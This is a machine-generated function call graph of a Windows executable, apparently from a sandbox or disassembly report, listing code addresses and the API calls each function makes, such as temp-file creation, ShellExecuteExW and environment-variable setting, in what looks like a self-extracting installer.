9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9533 404996 9067->9533 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9551 403e70 9074->9551 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9582 403093 9125->9582 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9616 402f6c ??2@YAPAXI 9132->9616 9622 402425 ??3@YAXPAX ??3@YAXPAX 9132->9622 9134->9131 9556 404cbc 9134->9556 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9649 403b40 9167->9649 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9623 40484d 9176->9623 9634 40408b 9176->9634 9178 4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9669 4082e9 9180->9669 9185 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9648 402425 ??3@YAXPAX ??3@YAXPAX 9182->9648 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9711 403f85 9198->9711 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9724 40786b 9219->9724 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9696 407613 9222->9696 9705 407674 9222->9705 9224->9222 9225 405d20 9226 405d65 9225->9226 9730 403e0d 9225->9730 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9734 40453e 9233->9734 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9743 4043c6 9252->9743 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9751 4048ab 9268->9751 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9748 402185 9337->9748 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9652 4083b6 9506->9652 9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 40661a 2 API calls 9533->9534 9535 4049af 9534->9535 9536 401f9d 19 API calls 9535->9536 9537 4049bd 9536->9537 9538 4024fc 2 API calls 9537->9538 9539 4049c7 9538->9539 9540 4049fd 9539->9540 9542 40254d ??2@YAPAXI ??3@YAXPAX 9539->9542 9541 40254d 2 API calls 9540->9541 9543 404a0a 9541->9543 9542->9539 9544 401f9d 19 API calls 9543->9544 9545 404a11 9544->9545 9546 40254d 2 API calls 9545->9546 9547 404a1b 9546->9547 9548 4073d1 21 API calls 9547->9548 9549 404a30 ??3@YAXPAX 9548->9549 9550 404a41 ctype 9549->9550 9550->9083 9552 40e8da ctype 3 API calls 9551->9552 9553 403e7e 9552->9553 9554 40e8da ctype 3 API calls 9553->9554 9555 40e943 ??3@YAXPAX 9554->9555 9555->9077 9557 40db53 2 API calls 9556->9557 9558 404ce8 9557->9558 9559 404d44 9558->9559 9561 4024fc 2 API calls 9558->9561 9560 4025ae 2 API calls 9559->9560 9562 404d4c 9560->9562 9563 404cf7 9561->9563 9564 403e86 2 API calls 9562->9564 9567 404db5 ??3@YAXPAX 9563->9567 9569 403354 86 API calls 9563->9569 9565 404d59 9564->9565 9566 403ef6 2 API calls 9565->9566 9568 404d66 9566->9568 9581 404db1 9567->9581 9570 403ef6 2 API calls 9568->9570 9571 404d1b 9569->9571 9572 404d73 9570->9572 9571->9567 9574 40db53 2 API calls 9571->9574 9573 403ef6 2 API calls 9572->9573 9575 404d80 9573->9575 9576 404d37 9574->9576 9577 40dd5f 2 API calls 9575->9577 9576->9567 9578 404d3b ??3@YAXPAX 9576->9578 9579 404d94 9577->9579 9578->9559 9579->9567 9580 404d9d ??3@YAXPAX 9579->9580 9580->9581 9581->9142 9583 4025ae 2 API calls 9582->9583 9599 4030a8 9583->9599 9584 403301 9585 403344 ??3@YAXPAX 9584->9585 9586 40334e 9585->9586 9586->9128 9586->9135 9587 401411 ??2@YAPAXI ??3@YAXPAX 9587->9599 9589 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9589->9599 9590 401362 2 API calls 9591 4030f3 ??3@YAXPAX ??3@YAXPAX 9590->9591 9592 403303 9591->9592 9591->9599 10393 4029c3 9592->10393 9596 40331c ??3@YAXPAX 9596->9586 9597 4031e5 strncmp 9598 4031d0 strncmp 9597->9598 9597->9599 9598->9597 9598->9599 9599->9584 9599->9587 9599->9589 9599->9590 9599->9592 9599->9597 9600 401362 2 API calls 9599->9600 9601 402640 2 API calls 9599->9601 9604 402640 ??2@YAPAXI ??3@YAXPAX 9599->9604 9606 4023dd lstrcmpW 9599->9606 9607 402f6c 7 API calls 9599->9607 9609 403330 9599->9609 9610 4032b2 lstrcmpW 9599->9610 9614 401329 2 API calls 9599->9614 10387 402986 9599->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9599->10392 9602 403252 ??3@YAXPAX 9600->9602 9601->9598 9603 402a69 9 API calls 9602->9603 9605 403263 lstrcmpW 9603->9605 9604->9599 9605->9599 9606->9599 9607->9599 9612 402f6c 7 API calls 9609->9612 9610->9599 9611 4032c0 lstrcmpW 9610->9611 9611->9599 9613 40333c 9612->9613 10411 402425 ??3@YAXPAX ??3@YAXPAX 9613->10411 9614->9599 9617 402f86 9616->9617 9618 402f7b 9616->9618 9620 408761 4 API calls 9617->9620 10413 402668 9618->10413 9621 402f92 9620->9621 9621->9132 9622->9132 9624 4024fc 2 API calls 9623->9624 9625 40485f 9624->9625 9626 40254d 2 API calls 9625->9626 9627 40486c 9626->9627 9628 404888 9627->9628 9629 401429 2 API calls 9627->9629 9630 40254d 2 API calls 9628->9630 9629->9627 9631 404892 9630->9631 9632 40408b 94 API calls 9631->9632 9633 40489d ??3@YAXPAX 9632->9633 9633->9176 9635 4040a2 lstrlenW 9634->9635 9636 4040ce 9634->9636 9637 401a85 4 API calls 9635->9637 9636->9176 9638 4040b8 9637->9638 9638->9635 9638->9636 9639 4040d5 9638->9639 9640 4024fc 2 API calls 9639->9640 9643 4040de 9640->9643 10418 402776 9643->10418 9644 403093 84 API calls 9645 40414c 9644->9645 9646 404156 ??3@YAXPAX ??3@YAXPAX 9645->9646 9647 40416d ??3@YAXPAX ??3@YAXPAX 9645->9647 9646->9636 9647->9636 9648->9189 9650 40661a 2 API calls 9649->9650 9651 403b48 9650->9651 9651->9178 9653 408646 9652->9653 9665 4083d5 ctype 9652->9665 9653->9184 9654 40661a 2 API calls 9654->9665 9655 40786b 23 API calls 9655->9665 9656 40243b lstrcmpW 9656->9665 9658 407674 23 API calls 9658->9665 9659 407613 23 API calls 9659->9665 9660 403b40 2 API calls 9660->9665 9661 401f9d 19 API calls 9661->9665 9662 407776 55 API calls 9662->9665 9663 403f48 4 API calls 9663->9665 9664 4073d1 21 API calls 9664->9665 9665->9653 9665->9654 9665->9655 9665->9656 9665->9658 9665->9659 9665->9660 9665->9661 9665->9662 9665->9663 9665->9664 9666 407717 25 API calls 9665->9666 9667 4073d1 21 API calls 9665->9667 10428 40744b 9665->10428 9666->9665 9668 408476 ??3@YAXPAX 9667->9668 9668->9665 9670 40243b lstrcmpW 9669->9670 9671 4082fd 9670->9671 9672 40830b 9671->9672 10432 4019f0 GetStdHandle WriteFile 9671->10432 9674 40831e 9672->9674 10433 4019f0 GetStdHandle WriteFile 9672->10433 9676 408333 9674->9676 10434 4019f0 GetStdHandle WriteFile 9674->10434 9678 408344 9676->9678 10435 4019f0 GetStdHandle WriteFile 9676->10435 9680 40243b lstrcmpW 9678->9680 9681 408351 9680->9681 9684 40835f 9681->9684 10436 4019f0 GetStdHandle WriteFile 9681->10436 9683 40243b lstrcmpW 9685 40836c 9683->9685 9684->9683 9686 40837a 9685->9686 10437 4019f0 GetStdHandle WriteFile 9685->10437 9688 40243b lstrcmpW 9686->9688 9689 408387 9688->9689 9690 408395 9689->9690 10438 4019f0 GetStdHandle WriteFile 9689->10438 9692 40243b lstrcmpW 9690->9692 9693 4083a2 9692->9693 9694 4083b2 9693->9694 10439 4019f0 GetStdHandle WriteFile 9693->10439 9694->9180 9697 407636 9696->9697 9698 407658 9697->9698 9699 40764b 9697->9699 10443 407186 9698->10443 10440 407154 9699->10440 9702 407653 9703 4073d1 21 API calls 9702->9703 9704 407671 9703->9704 9704->9222 9706 407689 9705->9706 9707 40716d 2 API calls 9706->9707 9708 407694 9707->9708 9709 4073d1 21 API calls 9708->9709 9710 4076a5 9709->9710 9710->9222 9712 401411 2 API calls 9711->9712 9713 403f96 9712->9713 9714 402535 2 API calls 9713->9714 9715 403f9f GetTempPathW 9714->9715 9716 403fb8 9715->9716 9721 403fcf 9715->9721 9717 402535 2 API calls 9716->9717 9718 403fc3 GetTempPathW 9717->9718 9718->9721 9719 402535 2 API calls 9720 403ff2 wsprintfW 9719->9720 9720->9721 9721->9719 9722 404009 GetFileAttributesW 9721->9722 9723 40402d 9721->9723 9722->9721 9722->9723 9723->9207 9725 40787e 9724->9725 10449 40719f 9725->10449 9728 4073d1 21 API calls 9729 4078b3 9728->9729 9729->9225 9731 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9730->9731 9732 403e16 9730->9732 9731->9226 9733 402c86 16 API calls 9732->9733 9733->9731 9735 40243b lstrcmpW 9734->9735 9736 40455d 9735->9736 9737 404592 9736->9737 9738 401329 2 API calls 9736->9738 9737->9277 9739 40456c 9738->9739 9740 403b7f 19 API calls 9739->9740 9741 404572 9740->9741 9741->9737 9742 401429 2 API calls 9741->9742 9742->9737 9744 4012f7 2 API calls 9743->9744 9745 4043d4 9744->9745 9746 40254d 2 API calls 9745->9746 9747 4043df 9746->9747 9747->9266 9749 4021a9 9748->9749 9750 40218e LoadLibraryA GetProcAddress 9748->9750 9749->9323 9750->9749 9752 401411 2 API calls 9751->9752 9759 4048bc 9752->9759 9753 401329 2 API calls 9753->9759 9754 40494e 9755 404988 ??3@YAXPAX 9754->9755 9757 4048ab 3 API calls 9754->9757 9755->9276 9756 401429 2 API calls 9756->9759 9758 404985 9757->9758 9758->9755 9759->9753 9759->9754 9759->9756 9760 40243b lstrcmpW 9759->9760 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 